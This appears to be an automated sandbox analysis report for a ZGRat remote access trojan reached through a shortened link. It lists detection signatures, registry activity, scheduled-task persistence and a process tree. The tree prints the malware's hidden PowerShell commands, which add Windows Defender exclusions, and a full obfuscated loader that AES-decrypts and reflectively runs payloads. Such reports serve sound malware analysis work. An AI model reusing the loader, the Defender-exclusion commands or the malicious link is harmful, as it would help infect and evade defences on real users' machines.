zgrat | hxxps://goo[.]su/nbyqnYl

Resubmissions

16/04/2024, 17:00

240416-vh45vaha6y 1

16/04/2024, 16:59

240416-vhhxlsfd58 10

16/04/2024, 16:43

240416-t79k7agf9y 10

Analysis

max time kernel
228s
max time network
238s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
16/04/2024, 16:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://goo.su/nbyqnYl

Score

10^/10

zgrat rat

Malware Config

Signatures

Detect ZGRat V1 1 IoCs

resource	yara_rule
behavioral1/memory/4288-1515-0x000000000B160000-0x000000000B1B6000-memory.dmp	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

.NET Reactor proctector 1 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/memory/4288-1515-0x000000000B160000-0x000000000B1B6000-memory.dmp	net_reactor

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\4183903823\2290032291.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\1601268389\715946058.pri	taskmgr.exe

Program crash 4 IoCs

pid	pid_target	Process	procid_target
4500	4288	WerFault.exe	118
2940	2828	WerFault.exe	123
5000	2828	WerFault.exe	123
1420	4288	WerFault.exe	118

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1368	schtasks.exe
2736	schtasks.exe
1028	schtasks.exe
2952	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

GoLang User-Agent 4 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	169	Go-http-client/1.1
HTTP User-Agent header	170	Go-http-client/1.1
HTTP User-Agent header	172	Go-http-client/1.1
HTTP User-Agent header	173	Go-http-client/1.1

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133577603855948059"	chrome.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-81807878-2351072935-4259904108-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-81807878-2351072935-4259904108-1000_Classes\Local Settings	taskmgr.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2296	chrome.exe
2296	chrome.exe
204	chrome.exe
204	chrome.exe
4856	powershell.exe
4856	powershell.exe
4856	powershell.exe
4856	powershell.exe
2088	powershell.exe
2088	powershell.exe
2088	powershell.exe
3020	powershell.exe
3020	powershell.exe
3020	powershell.exe
2088	powershell.exe
3020	powershell.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
1272	powershell.exe
1272	powershell.exe
1272	powershell.exe
1272	powershell.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
4288	powershell.exe
4288	powershell.exe
3336	taskmgr.exe
4288	powershell.exe
3336	taskmgr.exe
2828	powershell.exe
2828	powershell.exe
2828	powershell.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
4288	powershell.exe
3336	taskmgr.exe
2828	powershell.exe
2728	powershell.exe
2728	powershell.exe
3336	taskmgr.exe
3336	taskmgr.exe
4560	powershell.exe
4560	powershell.exe
2728	powershell.exe
4560	powershell.exe
3336	taskmgr.exe
3336	taskmgr.exe
4560	powershell.exe
2728	powershell.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2296	chrome.exe
Token: SeCreatePagefilePrivilege	2296	chrome.exe
Token: SeShutdownPrivilege	2296	chrome.exe
Token: SeCreatePagefilePrivilege	2296	chrome.exe
Token: SeShutdownPrivilege	2296	chrome.exe
Token: SeCreatePagefilePrivilege	2296	chrome.exe
Token: SeShutdownPrivilege	2296	chrome.exe
Token: SeCreatePagefilePrivilege	2296	chrome.exe
Token: 33	4916	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	4916	AUDIODG.EXE
Token: SeShutdownPrivilege	2296	chrome.exe
Token: SeCreatePagefilePrivilege	2296	chrome.exe
Token: SeShutdownPrivilege	2296	chrome.exe
Token: SeCreatePagefilePrivilege	2296	chrome.exe
Token: SeShutdownPrivilege	2296	chrome.exe
Token: SeCreatePagefilePrivilege	2296	chrome.exe
Token: SeShutdownPrivilege	2296	chrome.exe
Token: SeCreatePagefilePrivilege	2296	chrome.exe
Token: SeShutdownPrivilege	2296	chrome.exe
Token: SeCreatePagefilePrivilege	2296	chrome.exe
Token: SeShutdownPrivilege	2296	chrome.exe
Token: SeCreatePagefilePrivilege	2296	chrome.exe
Token: SeShutdownPrivilege	2296	chrome.exe
Token: SeCreatePagefilePrivilege	2296	chrome.exe
Token: SeShutdownPrivilege	2296	chrome.exe
Token: SeCreatePagefilePrivilege	2296	chrome.exe
Token: SeShutdownPrivilege	2296	chrome.exe
Token: SeCreatePagefilePrivilege	2296	chrome.exe
Token: SeShutdownPrivilege	2296	chrome.exe
Token: SeCreatePagefilePrivilege	2296	chrome.exe
Token: SeShutdownPrivilege	2296	chrome.exe
Token: SeCreatePagefilePrivilege	2296	chrome.exe
Token: SeShutdownPrivilege	2296	chrome.exe
Token: SeCreatePagefilePrivilege	2296	chrome.exe
Token: SeShutdownPrivilege	2296	chrome.exe
Token: SeCreatePagefilePrivilege	2296	chrome.exe
Token: SeShutdownPrivilege	2296	chrome.exe
Token: SeCreatePagefilePrivilege	2296	chrome.exe
Token: SeShutdownPrivilege	2296	chrome.exe
Token: SeCreatePagefilePrivilege	2296	chrome.exe
Token: SeShutdownPrivilege	2296	chrome.exe
Token: SeCreatePagefilePrivilege	2296	chrome.exe
Token: SeShutdownPrivilege	2296	chrome.exe
Token: SeCreatePagefilePrivilege	2296	chrome.exe
Token: SeShutdownPrivilege	2296	chrome.exe
Token: SeCreatePagefilePrivilege	2296	chrome.exe
Token: SeShutdownPrivilege	2296	chrome.exe
Token: SeCreatePagefilePrivilege	2296	chrome.exe
Token: SeShutdownPrivilege	2296	chrome.exe
Token: SeCreatePagefilePrivilege	2296	chrome.exe
Token: SeShutdownPrivilege	2296	chrome.exe
Token: SeCreatePagefilePrivilege	2296	chrome.exe
Token: SeShutdownPrivilege	2296	chrome.exe
Token: SeCreatePagefilePrivilege	2296	chrome.exe
Token: SeShutdownPrivilege	2296	chrome.exe
Token: SeCreatePagefilePrivilege	2296	chrome.exe
Token: SeShutdownPrivilege	2296	chrome.exe
Token: SeCreatePagefilePrivilege	2296	chrome.exe
Token: SeShutdownPrivilege	2296	chrome.exe
Token: SeCreatePagefilePrivilege	2296	chrome.exe
Token: SeShutdownPrivilege	2296	chrome.exe
Token: SeCreatePagefilePrivilege	2296	chrome.exe
Token: SeShutdownPrivilege	2296	chrome.exe
Token: SeCreatePagefilePrivilege	2296	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
2296	chrome.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2296 wrote to memory of 4692	2296	chrome.exe	73
PID 2296 wrote to memory of 4692	2296	chrome.exe	73
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 4624	2296	chrome.exe	75
PID 2296 wrote to memory of 3304	2296	chrome.exe	76
PID 2296 wrote to memory of 3304	2296	chrome.exe	76
PID 2296 wrote to memory of 3880	2296	chrome.exe	77
PID 2296 wrote to memory of 3880	2296	chrome.exe	77
PID 2296 wrote to memory of 3880	2296	chrome.exe	77
PID 2296 wrote to memory of 3880	2296	chrome.exe	77
PID 2296 wrote to memory of 3880	2296	chrome.exe	77
PID 2296 wrote to memory of 3880	2296	chrome.exe	77
PID 2296 wrote to memory of 3880	2296	chrome.exe	77
PID 2296 wrote to memory of 3880	2296	chrome.exe	77
PID 2296 wrote to memory of 3880	2296	chrome.exe	77
PID 2296 wrote to memory of 3880	2296	chrome.exe	77
PID 2296 wrote to memory of 3880	2296	chrome.exe	77
PID 2296 wrote to memory of 3880	2296	chrome.exe	77
PID 2296 wrote to memory of 3880	2296	chrome.exe	77
PID 2296 wrote to memory of 3880	2296	chrome.exe	77
PID 2296 wrote to memory of 3880	2296	chrome.exe	77
PID 2296 wrote to memory of 3880	2296	chrome.exe	77
PID 2296 wrote to memory of 3880	2296	chrome.exe	77
PID 2296 wrote to memory of 3880	2296	chrome.exe	77
PID 2296 wrote to memory of 3880	2296	chrome.exe	77
PID 2296 wrote to memory of 3880	2296	chrome.exe	77
PID 2296 wrote to memory of 3880	2296	chrome.exe	77
PID 2296 wrote to memory of 3880	2296	chrome.exe	77

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://goo.su/nbyqnYl
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2296
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffea8249758,0x7ffea8249768,0x7ffea8249778
  2⤵
  PID:4692
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1524 --field-trial-handle=1800,i,141433449985193621,1649139061680012679,131072 /prefetch:2
  2⤵
  PID:4624
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1788 --field-trial-handle=1800,i,141433449985193621,1649139061680012679,131072 /prefetch:8
  2⤵
  PID:3304
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2104 --field-trial-handle=1800,i,141433449985193621,1649139061680012679,131072 /prefetch:8
  2⤵
  PID:3880
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2960 --field-trial-handle=1800,i,141433449985193621,1649139061680012679,131072 /prefetch:1
  2⤵
  PID:4648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3088 --field-trial-handle=1800,i,141433449985193621,1649139061680012679,131072 /prefetch:1
  2⤵
  PID:1268
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4404 --field-trial-handle=1800,i,141433449985193621,1649139061680012679,131072 /prefetch:1
  2⤵
  PID:4640
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3152 --field-trial-handle=1800,i,141433449985193621,1649139061680012679,131072 /prefetch:1
  2⤵
  PID:3612
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3232 --field-trial-handle=1800,i,141433449985193621,1649139061680012679,131072 /prefetch:8
  2⤵
  PID:2132
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5132 --field-trial-handle=1800,i,141433449985193621,1649139061680012679,131072 /prefetch:8
  2⤵
  PID:4184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5676 --field-trial-handle=1800,i,141433449985193621,1649139061680012679,131072 /prefetch:8
  2⤵
  PID:4188
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5032 --field-trial-handle=1800,i,141433449985193621,1649139061680012679,131072 /prefetch:8
  2⤵
  PID:4252
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=2176 --field-trial-handle=1800,i,141433449985193621,1649139061680012679,131072 /prefetch:1
  2⤵
  PID:4168
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4848 --field-trial-handle=1800,i,141433449985193621,1649139061680012679,131072 /prefetch:1
  2⤵
  PID:1728
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5756 --field-trial-handle=1800,i,141433449985193621,1649139061680012679,131072 /prefetch:8
  2⤵
  PID:1692
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5272 --field-trial-handle=1800,i,141433449985193621,1649139061680012679,131072 /prefetch:8
  2⤵
  PID:4888
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5748 --field-trial-handle=1800,i,141433449985193621,1649139061680012679,131072 /prefetch:1
  2⤵
  PID:4536
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5100 --field-trial-handle=1800,i,141433449985193621,1649139061680012679,131072 /prefetch:8
  2⤵
  PID:4368
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6164 --field-trial-handle=1800,i,141433449985193621,1649139061680012679,131072 /prefetch:8
  2⤵
  PID:216
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5284 --field-trial-handle=1800,i,141433449985193621,1649139061680012679,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:204

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3704

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3e0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4916

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3372

C:\Users\Admin\Desktop\Loader.exe
"C:\Users\Admin\Desktop\Loader.exe"
1⤵
PID:3716

C:\Users\Admin\Desktop\Loader.exe
"C:\Users\Admin\Desktop\Loader.exe"
1⤵
PID:4676
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath \"C:\ProgramData\Microsoft\\\""
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4856
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath \"C:\ProgramData\""
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\ProgramData\driver2.cmd
  2⤵
  PID:4256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K C:\ProgramData\driver2.cmd
    3⤵
    PID:3344
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\ProgramData\driver2.cmd';$OtRn='CrHqHLeaHqHLtHqHLeDeHqHLcrHqHLypHqHLtHqHLorHqHL'.Replace('HqHL', ''),'TraemUMnsemUMfemUMoemUMremUMmFemUMiemUMnaemUMlemUMBlemUMocemUMkemUM'.Replace('emUM', ''),'GetdtMnCdtMnudtMnrrdtMnedtMnntdtMnProdtMncesdtMnsdtMn'.Replace('dtMn', ''),'LoaEkqSdEkqS'.Replace('EkqS', ''),'CoYBArpyYBArToYBAr'.Replace('YBAr', ''),'DeWFvScoWFvSmWFvSprWFvSessWFvS'.Replace('WFvS', ''),'InNPzivNPzioNPzikeNPzi'.Replace('NPzi', ''),'EnmOcXtrmOcXyPomOcXintmOcX'.Replace('mOcX', ''),'MawKnOinMwKnOodwKnOulwKnOewKnO'.Replace('wKnO', ''),'SDjtIpliDjtItDjtI'.Replace('DjtI', ''),'ElHxDPemHxDPentHxDPAtHxDP'.Replace('HxDP', ''),'RehrooahroodLhrooinhrooeshroo'.Replace('hroo', ''),'FfdhTrofdhTmBfdhTasfdhTe64fdhTStfdhTrifdhTngfdhT'.Replace('fdhT', ''),'ChSbbtanSbbtgSbbteExSbbttSbbtenSbbtsiSbbtoSbbtnSbbt'.Replace('Sbbt', '');powershell -w hidden;function IpDBZ($zdbNH){$hHYmF=[System.Security.Cryptography.Aes]::Create();$hHYmF.Mode=[System.Security.Cryptography.CipherMode]::CBC;$hHYmF.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$hHYmF.Key=[System.Convert]::($OtRn[12])('Csmx7EI2yjujgbDhnof51XZIbhx0Ab8yxshKqh+1TFw=');$hHYmF.IV=[System.Convert]::($OtRn[12])('W4wKO7GtfBJL9VPlL12wmQ==');$LmbRq=$hHYmF.($OtRn[0])();$AwlKe=$LmbRq.($OtRn[1])($zdbNH,0,$zdbNH.Length);$LmbRq.Dispose();$hHYmF.Dispose();$AwlKe;}function TnoCD($zdbNH){$MSMky=New-Object System.IO.MemoryStream(,$zdbNH);$wbEyv=New-Object System.IO.MemoryStream;$qvVev=New-Object System.IO.Compression.GZipStream($MSMky,[IO.Compression.CompressionMode]::($OtRn[5]));$qvVev.($OtRn[4])($wbEyv);$qvVev.Dispose();$MSMky.Dispose();$wbEyv.Dispose();$wbEyv.ToArray();}$idMoV=[System.IO.File]::($OtRn[11])([Console]::Title);$hoAcA=TnoCD (IpDBZ ([Convert]::($OtRn[12])([System.Linq.Enumerable]::($OtRn[10])($idMoV, 5).Substring(2))));$YKGvV=TnoCD (IpDBZ ([Convert]::($OtRn[12])([System.Linq.Enumerable]::($OtRn[10])($idMoV, 6).Substring(2))));[System.Reflection.Assembly]::($OtRn[3])([byte[]]$YKGvV).($OtRn[7]).($OtRn[6])($null,$null);[System.Reflection.Assembly]::($OtRn[3])([byte[]]$hoAcA).($OtRn[7]).($OtRn[6])($null,$null); "
      4⤵
      PID:1704
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4288
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4560
